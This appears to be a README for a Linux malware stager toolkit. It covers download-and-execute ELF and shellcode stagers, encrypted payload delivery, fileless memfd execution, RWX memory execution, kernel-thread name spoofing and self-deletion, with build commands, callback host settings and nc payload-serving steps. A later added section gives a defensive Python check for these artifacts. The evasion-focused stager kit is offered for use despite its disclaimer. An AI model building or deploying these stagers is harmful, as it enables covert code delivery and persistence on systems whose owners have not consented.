A collection of Linux stagers featuring basic ELF stagers, shellcode stagers, and encrypted shellcode stagers with RSA-2048 + AES-256-GCM hybrid encryption.
.
├── stagers/
│ ├── basic/ # Basic ELF download-and-execute stagers
│ ├── shellcode/ # Shellcode download-and-execute stagers
│ └── encrypted/ # Encrypted shellcode stagers with RSA+AES
├── tools/ # Encryption and key generation tools
├── scripts/ # Build and test automation scripts
├── elf_to_shellcode/ # ELF to shellcode conversion utility
└── README.md
- Download and execute ELF binaries via TCP or HTTP
- Fileless execution using memfd_create()
- Process name spoofing and self-deletion
- Download and execute raw shellcode via TCP or HTTP
- Direct memory execution with RWX pages
- Daemonization and process hiding
- RSA-2048 + AES-256-GCM hybrid encryption
- Embedded private key for decryption
- All features from shellcode stagers
cd stagers/basic
# Edit configuration in source file
#define HOST "127.0.0.1"
#define PORT 8080
# Compile
gcc -o stager_tcp linux_stager_tcp.c -O2 -s
gcc -o stager_http linux_stager_http.c -O2 -s
# Run server
nc -l -p 8080 < payload.elf
# Execute stager
./stager_tcp

cd stagers/shellcode
# Compile
gcc -o stager_tcp linux_stager_shellcode_tcp.c
gcc -o stager_http linux_stager_shellcode_http.c
# Run server
nc -l -p 8080 < shellcode.bin
# Execute stager
./stager_tcp

# Build tools
./scripts/build_encrypted_stagers.sh
# Generate keys
cd tools
./generate_keypair
# Embed private key
python3 embed_key.py ../stagers/encrypted/linux_stager_shellcode_tcp_encrypted.c stager_private.pem
# Compile stager
cd ../stagers/encrypted
gcc -o stager_tcp_encrypted linux_stager_shellcode_tcp_encrypted.c -lssl -lcrypto
# Encrypt shellcode
cd ../../tools
./encrypt_shellcode shellcode.bin stager_public.pem shellcode.enc
# Run server
nc -l -p 8080 < shellcode.enc
# Execute stager
cd ../stagers/encrypted
./stager_tcp_encrypted

All stagers use compile-time configuration via #define macros:
// TCP stagers
#define HOST "127.0.0.1"
#define PORT 8080
// HTTP stagers
#define HTTP_HOST "10.0.0.106"
#define HTTP_PORT 8080
#define HTTP_PATH "/payload"
// Process name spoofing
#define SPOOFED_PROC_NAME "[kworker/1:5-events]"

- generate_keypair: Generate RSA-2048 key pairs
- encrypt_shellcode: Encrypt shellcode with RSA+AES
- embed_key.py: Embed private key into C source files
- elf_to_shellcode: Convert ELF binaries to shellcode
[256 bytes] RSA-2048 encrypted AES key
[ 16 bytes] AES-GCM IV
[ 16 bytes] AES-GCM authentication tag
[variable ] AES-256-GCM encrypted shellcode
- Process name spoofing as kernel threads
- Binary self-deletion
- Pure memory execution (no disk writes)
- Double fork daemonization
- GCC compiler
- Linux kernel 3.17+ (for memfd_create)
- OpenSSL development libraries (for encrypted stagers)
- Python 3 (for embed_key.py)
# Ubuntu/Debian
sudo apt-get install build-essential libssl-dev python3
# CentOS/RHEL
sudo yum groupinstall "Development Tools"
sudo yum install openssl-devel python3

Legal Use Only: This toolset is for authorized penetration testing and security research in controlled environments.
Detection Risks:
- OpenSSL library dependencies may be flagged
- Network traffic patterns can be detected
- Memory scanning can detect RWX pages
- Process name spoofing may be detected
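
The memory and process-name risks above correspond to artifacts a defender can read from /proc. The following is an added example, not part of this project: it checks constructed /proc snapshots for a kernel-thread name on a userland process, a memfd-backed or deleted executable, and RWX mappings. The dictionary field names, sample values and finding labels are assumptions made for the illustration.

```python
import re

KTHREADD_PID = 2  # every genuine kernel thread is a child of kthreadd (PID 2)

# Constructed snapshots (not from a real host): comm, PPID, /proc/<pid>/cmdline,
# readlink of /proc/<pid>/exe (None when it fails), and /proc/<pid>/maps text.
SAMPLES = {
    37: {"comm": "kworker/1:5-events", "ppid": 2, "cmdline": "", "exe": None, "maps": ""},
    4120: {"comm": "payload", "ppid": 1, "cmdline": "[kworker/1:5-events]\0",
           "exe": "/memfd:x (deleted)",
           "maps": "7f3a1c000000-7f3a1c001000 rwxp 00000000 00:00 0\n"},
    913: {"comm": "sshd", "ppid": 1, "cmdline": "/usr/sbin/sshd\0-D\0",
          "exe": "/usr/sbin/sshd",
          "maps": "55d0a0000000-55d0a0020000 r-xp 00000000 08:01 131 /usr/sbin/sshd\n"},
}

def is_kernel_thread(p):
    """Kernel threads have PPID 2 (0 for kthreadd), empty cmdline and no exe link."""
    return p["ppid"] in (0, KTHREADD_PID) and not p["cmdline"] and p["exe"] is None

def claims_kthread_name(p):
    """True if argv[0] is bracketed like ps output for kernel threads, or comm says kworker."""
    argv0 = p["cmdline"].split("\0")[0]
    return bool(re.fullmatch(r"\[[^\]]+\]", argv0)) or p["comm"].startswith("kworker/")

def rwx_regions(maps_text):
    """Address ranges mapped writable and executable at once (JIT runtimes also hit this)."""
    hits = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) >= 2 and fields[1].startswith("rwx"):
            hits.append(fields[0])
    return hits

def findings(p):
    """Return the list of finding labels for one process snapshot."""
    out = []
    if claims_kthread_name(p) and not is_kernel_thread(p):
        out.append("spoofed-kthread-name")
    exe = p["exe"] or ""
    if exe.startswith("/memfd:"):
        out.append("memfd-exec")          # image came from memfd_create(), never on disk
    elif exe.endswith(" (deleted)"):
        out.append("deleted-binary")      # binary unlinked after start (self-deletion)
    if rwx_regions(p["maps"]):
        out.append("rwx-mapping")
    return out

if __name__ == "__main__":
    for pid, snapshot in SAMPLES.items():
        print(pid, findings(snapshot))
```

Each finding is a triage signal and not a verdict: JIT runtimes legitimately map RWX memory, and package upgrades leave running processes with deleted executables.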
This project is for educational purposes only. Use responsibly and only in authorized environments.
The authors and contributors are not responsible for misuse of this software. Users are solely responsible for ensuring they have proper authorization before using these tools.